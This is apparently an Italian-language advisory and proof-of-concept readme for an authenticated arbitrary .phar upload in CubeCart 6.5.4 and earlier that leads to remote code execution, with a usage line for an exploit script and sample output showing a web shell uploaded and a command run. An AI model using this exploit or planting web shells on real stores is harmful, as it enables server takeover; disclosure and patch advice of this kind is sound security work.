
CubeCart <= 6.5.4 è vulnerabile a un caricamento di file arbitrario che porta all'esecuzione di codice remoto (RCE).
CubeCart <= 6.5.4 è vulnerabile a un problema di caricamento arbitrario di file che porta all'esecuzione remota di codice (RCE). La vulnerabilità riguarda il file manager dell'applicazione e i suoi filtri, consentendo agli aggressori di caricare file .phar contenenti codice dannoso. CubeCart dovrebbe essere aggiornato alla versione 6.5.5, che implementa una patch di sicurezza per correggere questa vulnerabilità.
Per maggiori dettagli, consultare l'annuncio ufficiale di CubeCart nei riferimenti.
È stato creato un proof-of-concept (PoC) automatizzato, ma questa vulnerabilità può anche essere sfruttata manualmente caricando un file .phar dannoso tramite il file manager.
Questo è l'utilizzo del PoC:
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>
Dopo averlo eseguito, questo è l'output previsto per uno sfruttamento riuscito:
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami
[] ,----.___
__||_/___ '.
/ O|| /|
/ "" / /
/________/ / launching exploit
|________|/ please wait...
[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...
Output: www-data